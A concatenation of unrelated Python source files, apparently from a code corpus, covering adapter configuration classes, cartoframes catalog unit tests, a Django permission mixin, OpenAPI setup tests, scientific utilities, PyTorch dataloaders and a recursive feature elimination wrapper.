mh_adapter: bool = False
output_adapter: bool = True
non_linearity: str = "relu"
reduction_factor: int = 16
invertible_adapter: Optional[dict] = InvertibleAdapterConfig(
block_type="nice", non_linearity="relu", reduction_factor=2
)
@dataclass
class HoulsbyConfig(AdapterConfig):
"""
The adapter architecture proposed by Houlsby et. al., 2019.
Described in https://arxiv.org/pdf/1902.00751.pdf.
"""
original_ln_before: bool = False
original_ln_after: bool = True
residual_before_ln: bool = True
adapter_residual_before_ln: bool = False
ln_before: bool = False
ln_after: bool = False
mh_adapter: bool = True
output_adapter: bool = True
non_linearity: str = "swish"
reduction_factor: int = 16
ADAPTER_CONFIG_MAP = {"pfeiffer": PfeifferConfig(), "houlsby": HoulsbyConfig()}
DEFAULT_ADAPTER_CONFIG = "pfeiffer"
class ModelAdaptersConfig:
"""This class manages the setup and configuration of adapter modules in a pre-trained model.
"""
def __init__(self, **kwargs):
# adapters maps <name> -> (<type>, <config_name>)
self.adapters = kwargs.pop("adapters", {})
self.config_map = kwargs.pop("config_map", {})
def adapter_list(self, adapter_type: AdapterType) -> list:
return [k for k, v in self.adapters.items() if v[0] == adapter_type]
def get_type(self, adapter_name: str) -> Optional[AdapterType]:
if adapter_name in self.adapters:
return self.adapters[adapter_name][0]
else:
return None
def get(self, adapter_name: str, return_type: bool = False):
if adapter_name in self.adapters:
adapter_type, config_name = self.adapters[adapter_name]
if config_name in self.config_map:
config = self.config_map.get(config_name, None)
else:
config = ADAPTER_CONFIG_MAP.get(config_name, None)
if not config and adapter_type in self.config_map:
config = self.config_map[adapter_type]
elif (
not config
): # If no config is specified via config_name or adapter_type, we just use the global default
config = DEFAULT_ADAPTER_CONFIG
if isinstance(config, str):
config = ADAPTER_CONFIG_MAP[config]
else:
config, adapter_type = None, None
if return_type:
return config, adapter_type
else:
return config
def add(self, adapter_name: str, adapter_type: AdapterType, config: Optional[Union[str, dict]] = None):
if adapter_name in self.adapters:
raise ValueError(f"An adapter with the name '{adapter_name}' has already been added.")
if config is None and adapter_type not in self.config_map:
# if config is not specified & no per-type default is set, manually set global default
config = DEFAULT_ADAPTER_CONFIG
config_name = config
if isinstance(config, str):
if config not in ADAPTER_CONFIG_MAP and config not in self.config_map:
raise ValueError(f"Invalid adapter config identifier '{config}''")
# if it's a dict, compute it's hash and add a new entry to the config map
elif isinstance(config, Mapping):
config_name = get_adapter_config_hash(config)
self.config_map[config_name] = config
self.adapters[adapter_name] = (adapter_type, config_name)
logger.info(f"Adding adapter '{adapter_name}' of type '{adapter_type}'.")
def get_config(self, adapter_type: AdapterType) -> dict:
config = self.config_map.get(adapter_type, None)
if isinstance(config, str) and config in ADAPTER_CONFIG_MAP:
return ADAPTER_CONFIG_MAP[config]
return config
def set_config(self, adapter_type: AdapterType, config: Union[dict, str, AdapterConfig]):
"""Sets the default adapter configuration of the specified adapter type.
Args:
config (str or dict or AdapterConfig): adapter configuration, can be either:
- a string identifying a pre-defined adapter configuration
- a dictionary representing the adapter configuration
- the path to a file containing the adapter configuration
"""
assert len(self.adapter_list(adapter_type)) < 1, "Can only set new config if no adapters have been added."
if isinstance(config, Mapping) or config in ADAPTER_CONFIG_MAP:
self.config_map[adapter_type] = config
elif isfile(config):
with open(config, "r", encoding="utf-8") as f:
self.config_map[adapter_type] = json.load(f)
else:
raise ValueError("Unable to identify {} as a valid adapter config.".format(config))
def common_config_value(self, adapter_names: list, attribute: str):
"""Checks whether all adapters in a list share the same config setting for a given attribute and returns the shared value.
Args:
adapter_names (list): The adapters to check.
attribute (str): The config attribute to check.
"""
common_value = None
for i, name in enumerate(adapter_names):
config = self.get(name)
if not config:
raise ValueError(
f"No adapter with name '{name}' found. Make sure that an adapter with this name is loaded."
)
config_value = config.get(attribute, None)
if i > 0 and config_value != common_value:
raise ValueError(f"All given adapters must define the same value for config attribute {attribute}.")
common_value = config_value
return common_value
def to_dict(self):
output_dict = {}
output_dict["adapters"] = copy.deepcopy(self.adapters)
output_dict["config_map"] = copy.deepcopy(self.config_map)
return output_dict
def build_full_config(adapter_config, model_config, **kwargs):
config_dict = {"model_type": model_config.model_type, "hidden_size": model_config.hidden_size}
config_dict.update(kwargs)
if is_dataclass(adapter_config):
config_dict["config"] = adapter_config.to_dict()
else:
config_dict["config"] = adapter_config
return config_dict
@dataclass
class AdapterFusionConfig(Mapping):
"""Base class that models the architecture of an adapter."""
key: bool
query: bool
value: bool
query_before_ln: bool
regularization: bool
residual_before: bool
temperature: bool
value_before_softmax: bool
value_initialized: str
# We want to emulate a simple form of immutability while keeping the ability to add custom attributes.
# Therefore, we don't allow changing attribute values if set once.
def __setattr__(self, name, value):
if name in self.__dict__:
raise FrozenInstanceError()
else:
object.__setattr__(self, name, value)
def __delattr__(self, name):
raise FrozenInstanceError()
def __getitem__(self, key):
return self.__dict__[key]
def __iter__(self):
return iter(self.__dict__)
def __len__(self):
return len(self.__dict__)
def to_dict(self):
return asdict(self)
def replace(self, **changes):
return replace(self, **changes)
@classmethod
def from_dict(cls, config):
return cls(**config)
@classmethod
def load(cls, config: Union[dict, str], **kwargs):
"""Loads a given adapter configuration specifier into a full AdapterConfig instance.
Args:
config (Union[dict, str]): The configuration to load. Can be either:
- a dictionary representing the full config
- an identifier string available in ADAPTER_CONFIG_MAP
- the path to a file containing a full adapter configuration
- an identifier string available in Adapter-Hub
Returns:
dict: The resolved adapter configuration dictionary.
"""
# currently storing AdapterFusion weights on AdapterHub is not supported.
config_dict = resolve_adapter_config(config, local_map=ADAPTERFUSION_CONFIG_MAP, try_loading_from_hub=False)
# convert back to dict to allow attr overrides
if isinstance(config_dict, AdapterFusionConfig):
config_dict = config_dict.to_dict()
config_dict.update(kwargs)
return AdapterFusionConfig.from_dict(config_dict)
@dataclass
class StaticAdapterFusionConfig(AdapterFusionConfig):
"""
The adapter architecture proposed by Houlsby et. al., 2019.
Described in https://arxiv.org/pdf/1902.00751.pdf.
"""
key: bool = True
query: bool = True
value: bool = False
query_before_ln: bool = False
regularization: bool = False
residual_before: bool = False
temperature: bool = False
value_before_softmax: bool = True
value_initialized: str = False
@dataclass
class DynamicAdapterFusionConfig(AdapterFusionConfig):
"""
The adapter architecture proposed by Houlsby et. al., 2019.
Described in https://arxiv.org/pdf/1902.00751.pdf.
"""
key: bool = True
query: bool = True
value: bool = True
query_before_ln: bool = False
regularization: bool = True
residual_before: bool = False
temperature: bool = False
value_before_softmax: bool = True
value_initialized: str = True
ADAPTERFUSION_CONFIG_MAP = {"static": StaticAdapterFusionConfig(), "dynamic": DynamicAdapterFusionConfig()}
DEFAULT_ADAPTERFUSION_CONFIG = "dynamic"
|
470066
|
import os
import pytest
import pandas as pd
from unittest.mock import patch
from pyrestcli.exceptions import ServerErrorException
from cartoframes.auth import Credentials
from cartoframes.data.observatory.catalog.entity import CatalogList
from cartoframes.data.observatory.catalog.geography import Geography
from cartoframes.data.observatory.catalog.repository.geography_repo import GeographyRepository
from cartoframes.data.observatory.catalog.repository.dataset_repo import DatasetRepository
from cartoframes.data.observatory.catalog.subscription_info import SubscriptionInfo
from cartoframes.data.observatory.catalog.repository.constants import GEOGRAPHY_FILTER
from .examples import (
test_geography1, test_geographies, test_datasets, db_geography1,
test_geography2, db_geography2, test_subscription_info
)
from carto.do_dataset import DODataset
class TestGeography(object):
@patch.object(GeographyRepository, 'get_by_id')
def test_get_geography_by_id(self, mocked_repo):
# Given
mocked_repo.return_value = test_geography1
# When
geography = Geography.get(test_geography1.id)
# Then
assert isinstance(geography, object)
assert isinstance(geography, Geography)
assert geography == test_geography1
@patch.object(DatasetRepository, 'get_all')
def test_get_datasets_by_geography(self, mocked_repo):
# Given
mocked_repo.return_value = test_datasets
# When
datasets = test_geography1.datasets
# Then
mocked_repo.assert_called_once_with({GEOGRAPHY_FILTER: test_geography1.id})
assert isinstance(datasets, list)
assert isinstance(datasets, CatalogList)
assert datasets == test_datasets
def test_geography_properties(self):
# Given
geography = Geography(db_geography1)
# When
geography_id = geography.id
slug = geography.slug
name = geography.name
description = geography.description
country = geography.country
language = geography.language
provider = geography.provider
geom_coverage = geography.geom_coverage
update_frequency = geography.update_frequency
version = geography.version
is_public_data = geography.is_public_data
summary = geography.summary
# Then
assert geography_id == db_geography1['id']
assert slug == db_geography1['slug']
assert name == db_geography1['name']
assert description == db_geography1['description']
assert country == db_geography1['country_id']
assert language == db_geography1['lang']
assert provider == db_geography1['provider_id']
assert geom_coverage == db_geography1['geom_coverage']
assert update_frequency == db_geography1['update_frequency']
assert version == db_geography1['version']
assert is_public_data == db_geography1['is_public_data']
assert summary == db_geography1['summary_json']
def test_geography_is_exported_as_series(self):
# Given
geography = test_geography1
# When
geography_series = geography.to_series()
# Then
assert isinstance(geography_series, pd.Series)
assert geography_series['id'] == geography.id
def test_geography_is_exported_as_dict(self):
# Given
geography = Geography(db_geography1)
excluded_fields = ['summary_json', 'geom_coverage']
expected_dict = {key: value for key, value in db_geography1.items() if key not in excluded_fields}
# When
geography_dict = geography.to_dict()
# Then
assert isinstance(geography_dict, dict)
assert geography_dict == expected_dict
def test_geography_is_represented_with_classname_and_slug(self):
# Given
geography = Geography(db_geography1)
# When
geography_repr = repr(geography)
# Then
assert geography_repr == "<Geography.get('{id}')>".format(id=db_geography1['slug'])
def test_geography_is_printed_with_classname(self):
# Given
geography = Geography(db_geography1)
# When
geography_str = str(geography)
# Then
assert geography_str == "<Geography.get('{id}')>".format(id=db_geography1['slug'])
@patch.object(GeographyRepository, 'get_all')
def test_get_all_geographies(self, mocked_repo):
# Given
mocked_repo.return_value = test_geographies
# When
geographies = Geography.get_all()
# Then
assert isinstance(geographies, list)
assert isinstance(geographies, CatalogList)
assert geographies == test_geographies
@patch.object(GeographyRepository, 'get_all')
def test_get_all_geographies_credentials(self, mocked_repo):
# Given
mocked_repo.return_value = test_geographies
credentials = Credentials('fake_user', '1234')
# When
geographies = Geography.get_all(credentials=credentials)
# Then
mocked_repo.assert_called_once_with(None, credentials)
assert isinstance(geographies, list)
assert isinstance(geographies, CatalogList)
assert geographies == test_geographies
@patch.object(GeographyRepository, 'get_all')
def test_get_all_geographies_credentials_without_do_enabled(self, mocked_repo):
# Given
def raise_exception(a, b):
raise ServerErrorException(['The user does not have Data Observatory enabled'])
mocked_repo.side_effect = raise_exception
credentials = Credentials('fake_user', '<PASSWORD>')
# When
with pytest.raises(Exception) as e:
Geography.get_all(credentials=credentials)
# Then
assert str(e.value) == (
'We are sorry, the Data Observatory is not enabled for your account yet. '
'Please contact your customer success manager or send an email to '
'<EMAIL> to request access to it.')
def test_geography_list_is_printed_with_classname_and_slugs(self):
# Given
geographies = CatalogList([test_geography1, test_geography2])
# When
categories_str = str(geographies)
# Then
assert categories_str == "[<Geography.get('{id1}')>, <Geography.get('{id2}')>]" \
.format(id1=db_geography1['slug'], id2=db_geography2['slug'])
def test_geography_list_is_represented_with_classname_and_slugs(self):
# Given
geographies = CatalogList([test_geography1, test_geography2])
# When
categories_repr = repr(geographies)
# Then
assert categories_repr == "[<Geography.get('{id1}')>, <Geography.get('{id2}')>]"\
.format(id1=db_geography1['slug'], id2=db_geography2['slug'])
def test_geographies_items_are_obtained_as_geography(self):
# Given
geographies = test_geographies
# When
geography = geographies[0]
# Then
assert isinstance(geography, Geography)
assert geography == test_geography1
def test_geographies_are_exported_as_dataframe(self):
# Given
geographies = test_geographies
geography = geographies[0]
expected_geography_df = geography.to_series()
del expected_geography_df['summary_json']
# When
geography_df = geographies.to_dataframe()
sliced_geography = geography_df.iloc[0]
# Then
assert isinstance(geography_df, pd.DataFrame)
assert isinstance(sliced_geography, pd.Series)
assert sliced_geography.equals(expected_geography_df)
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch.object(GeographyRepository, 'get_by_id')
@patch.object(DODataset, 'download_stream')
def test_geography_download(self, mock_download_stream, mock_get_by_id, mock_subscription_ids):
# Given
mock_get_by_id.return_value = test_geography1
geography = Geography.get(test_geography1.id)
mock_download_stream.return_value = []
mock_subscription_ids.return_value = [test_geography1.id]
credentials = Credentials('fake_user', '<PASSWORD>')
# Then
geography.to_csv('fake_path', credentials)
os.remove('fake_path')
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch.object(GeographyRepository, 'get_by_id')
def test_geography_download_not_subscribed(self, mock_get_by_id, mock_subscription_ids):
# Given
mock_get_by_id.return_value = test_geography2 # is private
geography = Geography.get(test_geography2.id)
mock_subscription_ids.return_value = []
credentials = Credentials('fake_user', '<PASSWORD>')
with pytest.raises(Exception) as e:
geography.to_csv('fake_path', credentials)
# Then
assert str(e.value) == (
'You are not subscribed to this Geography yet. '
'Please, use the subscribe method first.')
@patch.object(GeographyRepository, 'get_by_id')
@patch.object(DODataset, 'download_stream')
def test_geography_download_not_subscribed_but_public(self, mock_download_stream, mock_get_by_id):
# Given
mock_get_by_id.return_value = test_geography1 # is public
geography = Geography.get(test_geography1.id)
mock_download_stream.return_value = []
credentials = Credentials('fake_user', '<PASSWORD>')
geography.to_csv('fake_path', credentials)
os.remove('fake_path')
@patch.object(GeographyRepository, 'get_by_id')
@patch.object(DODataset, 'download_stream')
def test_geography_download_without_do_enabled(self, mock_download_stream, mock_get_by_id):
# Given
mock_get_by_id.return_value = test_geography1
geography = Geography.get(test_geography1.id)
def raise_exception(limit=None, order_by=None, sql_query=None, add_geom=None, is_geography=None):
raise ServerErrorException(['The user does not have Data Observatory enabled'])
mock_download_stream.side_effect = raise_exception
credentials = Credentials('fake_user', '<PASSWORD>')
# When
with pytest.raises(Exception) as e:
geography.to_csv('fake_path', credentials)
# Then
assert str(e.value) == (
'We are sorry, the Data Observatory is not enabled for your account yet. '
'Please contact your customer success manager or send an email to '
'<EMAIL> to request access to it.')
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch('cartoframes.data.observatory.catalog.utils.display_subscription_form')
@patch('cartoframes.data.observatory.catalog.utils.display_existing_subscription_message')
def test_geography_subscribe(self, mock_display_message, mock_display_form, mock_subscription_ids):
# Given
expected_id = db_geography1['id']
expected_subscribed_ids = []
mock_subscription_ids.return_value = expected_subscribed_ids
credentials = Credentials('fake_user', '<PASSWORD>')
geography = Geography(db_geography1)
# When
geography.subscribe(credentials)
# Then
mock_subscription_ids.assert_called_once_with(credentials, 'geography')
mock_display_form.assert_called_once_with(expected_id, 'geography', credentials)
assert not mock_display_message.called
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch('cartoframes.data.observatory.catalog.utils.display_subscription_form')
@patch('cartoframes.data.observatory.catalog.utils.display_existing_subscription_message')
def test_geography_subscribe_existing(self, mock_display_message, mock_display_form, mock_subscription_ids):
# Given
expected_id = db_geography1['id']
expected_subscribed_ids = [expected_id]
mock_subscription_ids.return_value = expected_subscribed_ids
credentials = Credentials('fake_user', '<PASSWORD>')
geography = Geography(db_geography1)
# When
geography.subscribe(credentials)
# Then
mock_subscription_ids.assert_called_once_with(credentials, 'geography')
mock_display_message.assert_called_once_with(expected_id, 'geography')
assert not mock_display_form.called
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch('cartoframes.data.observatory.catalog.utils.display_subscription_form')
@patch('cartoframes.auth.defaults.get_default_credentials')
def test_geography_subscribe_default_credentials(
self, mocked_credentials, mock_display_form, mock_subscription_ids):
# Given
expected_credentials = Credentials('fake_user', '<PASSWORD>')
mocked_credentials.return_value = expected_credentials
geography = Geography(db_geography1)
# When
geography.subscribe()
# Then
mock_subscription_ids.assert_called_once_with(expected_credentials, 'geography')
mock_display_form.assert_called_once_with(db_geography1['id'], 'geography', expected_credentials)
def test_geography_subscribe_wrong_credentials(self):
# Given
wrong_credentials = 1234
geography = Geography(db_geography1)
# When
with pytest.raises(ValueError) as e:
geography.subscribe(wrong_credentials)
# Then
assert str(e.value) == ('Credentials attribute is required. '
'Please pass a `Credentials` instance '
'or use the `set_default_credentials` function.')
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch('cartoframes.data.observatory.catalog.utils.display_subscription_form')
def test_geography_subscribe_without_do_enabled(self, mock_display_form, mock_subscription_ids):
# Given
def raise_exception(a, b, c):
raise ServerErrorException(['The user does not have Data Observatory enabled'])
mock_display_form.side_effect = raise_exception
geography = Geography(db_geography1)
credentials = Credentials('fake_user', '<PASSWORD>')
# When
with pytest.raises(Exception) as e:
geography.subscribe(credentials)
# Then
assert str(e.value) == (
'We are sorry, the Data Observatory is not enabled for your account yet. '
'Please contact your customer success manager or send an email to '
'<EMAIL> to request access to it.')
@patch('cartoframes.data.observatory.catalog.subscription_info.fetch_subscription_info')
def test_geography_subscription_info(self, mock_fetch):
# Given
mock_fetch.return_value = test_subscription_info
credentials = Credentials('fake_user', '<PASSWORD>')
geography = Geography(db_geography1)
# When
info = geography.subscription_info(credentials)
# Then
mock_fetch.assert_called_once_with(db_geography1['id'], 'geography', credentials)
assert isinstance(info, SubscriptionInfo)
assert info.id == test_subscription_info['id']
assert info.estimated_delivery_days == test_subscription_info['estimated_delivery_days']
assert info.subscription_list_price == test_subscription_info['subscription_list_price']
assert info.tos == test_subscription_info['tos']
assert info.tos_link == test_subscription_info['tos_link']
assert info.licenses == test_subscription_info['licenses']
assert info.licenses_link == test_subscription_info['licenses_link']
assert info.rights == test_subscription_info['rights']
assert str(info) == 'Properties: id, estimated_delivery_days, ' + \
'subscription_list_price, tos, tos_link, ' + \
'licenses, licenses_link, rights'
@patch('cartoframes.data.observatory.catalog.subscription_info.fetch_subscription_info')
@patch('cartoframes.auth.defaults.get_default_credentials')
def test_geography_subscription_info_default_credentials(self, mocked_credentials, mock_fetch):
# Given
expected_credentials = Credentials('fake_user', '<PASSWORD>')
mocked_credentials.return_value = expected_credentials
geography = Geography(db_geography1)
# When
geography.subscription_info()
# Then
mock_fetch.assert_called_once_with(db_geography1['id'], 'geography', expected_credentials)
def test_geography_subscription_info_wrong_credentials(self):
# Given
wrong_credentials = 1234
geography = Geography(db_geography1)
# When
with pytest.raises(ValueError) as e:
geography.subscription_info(wrong_credentials)
# Then
assert str(e.value) == ('Credentials attribute is required. '
'Please pass a `Credentials` instance '
'or use the `set_default_credentials` function.')
@patch('cartoframes.data.observatory.catalog.subscription_info.fetch_subscription_info')
def test_geography_subscription_info_without_do_enabled(self, mock_fetch):
# Given
def raise_exception(a, b, c):
raise ServerErrorException(['The user does not have Data Observatory enabled'])
mock_fetch.side_effect = raise_exception
geography = Geography(db_geography1)
credentials = Credentials('fake_user', '<PASSWORD>')
# When
with pytest.raises(Exception) as e:
geography.subscription_info(credentials)
# Then
assert str(e.value) == (
'We are sorry, the Data Observatory is not enabled for your account yet. '
'Please contact your customer success manager or send an email to '
'<EMAIL> to request access to it.')
|
470077
|
from braces.views import LoginRequiredMixin
from django.core.exceptions import PermissionDenied
from django.views.generic import View
from guardian.shortcuts import get_perms
def has_perms(user, perms, obj=None, required_all=True):
if obj:
perms_obj = get_perms(user, obj)
tests = [perm in perms_obj for perm in perms]
else:
tests = [user.has_perm(perm) for perm in perms]
if required_all and all(tests):
return True
if not required_all and any(tests):
return True
raise PermissionDenied
class PermissionMixin(LoginRequiredMixin, View):
def get_queryset(self, *args, **kwargs):
qs = super().get_queryset(*args, **kwargs)
return qs.for_user(self.request.user)
|
470084
|
from pathlib import Path
import pytest
from aiohttp import web
from pyrsistent import pmap
from rororo import OperationTableDef, setup_openapi
from rororo.openapi.constants import HANDLER_OPENAPI_MAPPING_KEY
from rororo.openapi.exceptions import ConfigurationError
ROOT_PATH = Path(__file__).parent
OPENAPI_JSON_PATH = ROOT_PATH / "openapi.json"
OPENAPI_YAML_PATH = ROOT_PATH / "openapi.yaml"
def test_add_operations():
operations = OperationTableDef()
other = OperationTableDef()
all_operations = OperationTableDef()
@operations.register
@all_operations.register
async def create(request: web.Request) -> web.Response:
return web.json_response(True, status=201)
@other.register
@all_operations.register
async def update(request: web.Request) -> web.Response:
return web.json_response(True)
assert operations + other == all_operations
assert operations != all_operations
assert other != all_operations
operations += other
assert operations == all_operations
assert other != all_operations
@pytest.mark.parametrize("schema_path", (OPENAPI_JSON_PATH, OPENAPI_YAML_PATH))
def test_cache_create_schema_and_spec(schema_path):
operations = OperationTableDef()
for _ in range(10):
setup_openapi(
web.Application(),
schema_path,
operations,
server_url="/api/",
cache_create_schema_and_spec=True,
)
def test_handle_all_create_schema_and_spec_errors(tmp_path):
invalid_json = tmp_path / "invalid_openapi.json"
invalid_json.write_text('{"openapi": "3.')
with pytest.raises(ConfigurationError):
setup_openapi(web.Application(), invalid_json, OperationTableDef())
def test_ignore_non_http_view_methods():
operations = OperationTableDef()
@operations.register
class UserView(web.View):
async def get(self) -> web.Response:
return web.json_response(True)
@operations.register("update_user")
async def patch(self) -> web.Response:
return web.json_response(True)
async def get_user_or_404(self):
raise NotImplementedError
def log_user(self, user):
raise NotImplementedError
assert getattr(UserView, HANDLER_OPENAPI_MAPPING_KEY) == pmap(
{"GET": UserView.get.__qualname__, "PATCH": "update_user"}
)
def test_missed_schema_path_or_schema_and_spec():
with pytest.raises(ConfigurationError):
setup_openapi(web.Application(), OperationTableDef())
|
470094
|
import inspect
def AssignMemberVariablesFromParameters(exclude=None, onlyInclude=None):
"""Assign member variables in the caller's object from the caller's parameters.
The caller should be a method associated with an object. Keyword arguments
are supported, but variable arguments are not since they don't have names.
exclude is an optional iterable that specifies names to be explicitly
excluded. If the optional iterable onlyInclude is specified,
parameters / member variables not in onlyInclude will be ignored.
>>> class c:
... def __init__(self, a, b, c=3, **kwargs):
... AssignMemberVariablesFromParameters()
...
... def ignore_a_b(self, a, b, c, d):
... AssignMemberVariablesFromParameters(exclude=['a', 'b'])
...
... def ignore_c_d(alternateNameForSelf, a, b, c, d):
... AssignMemberVariablesFromParameters(onlyInclude=['a', 'b'])
>>> x = c(1, 2, d=4)
>>> (x.a, x.b, x.c, x.d)
(1, 2, 3, 4)
>>> x.ignore_a_b(10, 20, 30, 40)
>>> (x.a, x.b, x.c, x.d)
(1, 2, 30, 40)
>>> x.ignore_c_d(100, 200, 300, 400)
>>> (x.a, x.b, x.c, x.d)
(100, 200, 30, 40)
>>> class c:
... __slots__ = ['a', 'b', 'c']
...
... def __init__(self, a, b):
... AssignMemberVariablesFromParameters()
>>> x = c(1, 2)
>>> (x.a, x.b)
(1, 2)
"""
args, varargs, varkw, defaults = inspect.getargvalues(inspect.stack()[1][0])
self = args[0]
if exclude == None:
exclude = []
else:
exclude = [arg for arg in exclude]
if onlyInclude == None:
onlyInclude = [arg for arg in args if arg != self]
if varkw:
onlyInclude += [arg for arg in defaults[varkw].keys() if arg != self]
for arg in onlyInclude:
if arg not in exclude:
if arg in defaults:
value = defaults[arg]
elif varkw and arg in defaults[varkw]:
value = defaults[varkw][arg]
else:
value = None
exec 'defaults[self].%s = %s' % (arg, 'value')
|
470142
|
import numpy as np
## define zigzag
def find_loopout_regions(zxys, region_ids=None,
method='neighbor', dist_th=1500,
neighbor_region_num=5):
"""Function to find loopout, or zig-zag features within chromosomes.
Inputs:
Outputs:
"""
# convert inputs
from ..spot_tools.scoring import _local_distance
from ..spot_tools.scoring import _neighboring_distance
_zxys = np.array(zxys)
# if region ids not specified, presume it is continuous
if region_ids is None:
region_ids = np.arange(len(_zxys))
else:
region_ids = np.array(region_ids)
# identify distance to neighbors
if method == 'neighbor':
_nb_dists = _neighboring_distance(zxys, spot_ids=region_ids, neighbor_step=1)[:-1]
_loopout_flags = np.zeros(len(zxys))
_loopout_flags[1:] += (_nb_dists >= dist_th) * (1-np.isnan(_nb_dists))
_loopout_flags[:-1] += (_nb_dists >= dist_th) * (1-np.isnan(_nb_dists))
return _loopout_flags == 2
elif method == 'local':
_lc_dists = _local_distance(zxys, spot_ids=region_ids,
sel_zxys=zxys, sel_ids=region_ids, local_size=neighbor_region_num)
return _lc_dists >= dist_th
else:
raise ValueError(f"wrong input method:{method}, exit.")
|
470162
|
from __future__ import print_function
import numpy as np
from ..tools.classifiertools import to_onehot
class Generator(object):
def __init__(
self,
preprocessor,
segment_ids,
n_classes,
train=True,
batch_size=16,
shuffle=False,
):
self.preprocessor = preprocessor
self.segment_ids = segment_ids
self.n_classes = n_classes
self.train = train
self.batch_size = batch_size
self.shuffle = shuffle
self.n_segments = len(self.segment_ids)
self.n_batches = int(np.ceil(float(self.n_segments) / batch_size))
self._i = 0
def __iter__(self):
return self
def next(self):
if self.shuffle and self._i == 0:
np.random.shuffle(self.segment_ids)
self.batch_ids = self.segment_ids[self._i : self._i + self.batch_size]
self._i = self._i + self.batch_size
if self._i >= self.n_segments:
self._i = 0
batch_segments, batch_classes = self.preprocessor.get_processed(
self.batch_ids, train=self.train
)
batch_segments = batch_segments[:, :, :, :, None]
batch_classes = to_onehot(batch_classes, self.n_classes)
return batch_segments, batch_classes
class GeneratorFeatures(object):
def __init__(self, features, classes, n_classes=2, batch_size=16, shuffle=True):
self.features = features
self.classes = np.asarray(classes)
self.n_classes = n_classes
self.batch_size = batch_size
self.shuffle = shuffle
self.n_samples = features.shape[0]
self.n_batches = int(np.ceil(float(self.n_samples) / batch_size))
self._i = 0
self.sample_ids = list(range(self.n_samples))
if shuffle:
np.random.shuffle(self.sample_ids)
def next(self):
batch_ids = self.sample_ids[self._i : self._i + self.batch_size]
self._i = self._i + self.batch_size
if self._i >= self.n_samples:
self._i = 0
batch_features = self.features[batch_ids, :]
batch_classes = self.classes[batch_ids]
batch_classes = to_onehot(batch_classes, self.n_classes)
return batch_features, batch_classes
|
470240
|
import sys
if sys.version_info < (3, 0):
reload(sys) # noqa: F821
sys.setdefaultencoding("utf-8")
|
470243
|
import os
import math
import numpy as np
from torchvision import transforms
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
from src.utils import args
from .datasets import CIFAR10, CelebA, Imagenette, ImageNet32, ImageNet64
ROOT = './data_root/'
# ----- Dataset Splitter -----
def get_samplers(num_train, valid_size):
use_percentage=True if isinstance(valid_size, float) else False
# obtain training indices that will be used for validation
indices = list(range(num_train))
if use_percentage:
np.random.shuffle(indices)
split = int(np.floor(valid_size * num_train))
train_idx, valid_idx = indices[split:], indices[:split]
else:
train_idx, valid_idx = indices[:-valid_size], indices[-valid_size:]
# define samplers for obtaining training and validation batches
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
return train_sampler, valid_sampler
# ----- Data Transformations -----
def data_transformations(dataset):
if dataset in ['CIFAR10', 'Imagenette', 'ImageNet32', 'ImageNet64']:
res = args.img_resize if args.img_resize is not None else 32
train_transform = transforms.Compose([
transforms.Resize((res, res)),
transforms.RandomHorizontalFlip(),
transforms.Pad(int(math.ceil(res * 0.05)), padding_mode='edge'),
transforms.RandomAffine(degrees=0, translate=(0.05, 0.05)),
transforms.CenterCrop(res),
transforms.ToTensor()
])
valid_transform = transforms.Compose([
transforms.Resize((res, res)),
transforms.ToTensor()
])
elif dataset in ['CelebA']:
Crop = transforms.Lambda(lambda x: transforms.functional.crop(x, 40, 15, 148, 148))
res = args.resolution
train_transform = valid_transform = transforms.Compose([
Crop,
transforms.Resize((res, res)),
transforms.ToTensor()
])
else:
raise NotImplementedError
return train_transform, valid_transform
# ----- DataLoader -----
def dataloader(dataset=args.dataset, data_root=ROOT, batch_size=args.batch_size, num_workers=6, pin_memory=True):
# dataset and data loader kwargs
kwargs = {} if args.device == 'cpu' else {'num_workers': num_workers, 'pin_memory': pin_memory}
dataset_kwargs = {'root':os.path.join(data_root, dataset), 'download':True}
loader_kwargs = {'batch_size':batch_size, **kwargs}
# get data transformation
train_transform, valid_transform = data_transformations(dataset)
# build datasets
train_data = globals()[dataset](train=True, transform=train_transform, **dataset_kwargs)
valid_data = globals()[dataset](train=True, transform=valid_transform, **dataset_kwargs)
test_data = globals()[dataset](train=False, transform=valid_transform, **dataset_kwargs)
# define samplers for obtaining training and validation batches
train_sampler, valid_sampler = get_samplers(len(train_data), 0.15)
# Build dataloaders
train_loader = DataLoader(train_data, sampler=train_sampler, **loader_kwargs)
valid_loader = DataLoader(valid_data, sampler=valid_sampler, **loader_kwargs)
test_loader = DataLoader(test_data, shuffle=False, **loader_kwargs)
return train_loader, valid_loader, test_loader
if __name__ == "__main__":
pass
|
470251
|
from logging import getLogger
import numpy as np
from sklearn.model_selection import cross_val_score
from ...utils import generate_features, BaseWrapper
class RecursiveElimination(BaseWrapper):
"""Recursive feature elimination algorithm.
Parameters
----------
estimator : object
A supervised learning estimator that should have a fit(X, y) method, a
predict(X) method and a field corresponding to feature weights.
n_features : int
Number of features to leave.
measure : string or callable
A standard estimator metric (e.g. 'f1' or 'roc_auc') or a callable with
signature measure(estimator, X, y) which should return only a single
value.
weight_func : callable
A function to extract weights from the model.
cv : int
Number of folds in cross-validation.
See Also
--------
<NAME>., <NAME>., <NAME>., & <NAME>., “Gene selection for
cancer classification using support vector machines”, Mach. Learn.,
46(1-3), 389–422, 2002.
https://link.springer.com/article/10.1023/A:1012487302797
Examples
--------
>>> from sklearn.datasets import make_classification
>>> from ITMO_FS.wrappers import RecursiveElimination
>>> from sklearn.svm import SVC
>>> import numpy as np
>>> dataset = make_classification(n_samples=100, n_features=20,
... n_informative=4, n_redundant=0, shuffle=False, random_state=42)
>>> x, y = np.array(dataset[0]), np.array(dataset[1])
>>> model = SVC(kernel='linear')
>>> rfe = RecursiveElimination(model, 5, measure='f1_macro',
... weight_func=lambda model: np.square(model.coef_).sum(axis=0)).fit(x, y)
>>> rfe.selected_features_
array([ 0, 1, 2, 11, 19], dtype=int64)
"""
def __init__(self, estimator, n_features, measure, weight_func, cv=3):
self.estimator = estimator
self.n_features = n_features
self.measure = measure
self.weight_func = weight_func
self.cv = cv
def _fit(self, X, y):
"""Fit the wrapper.
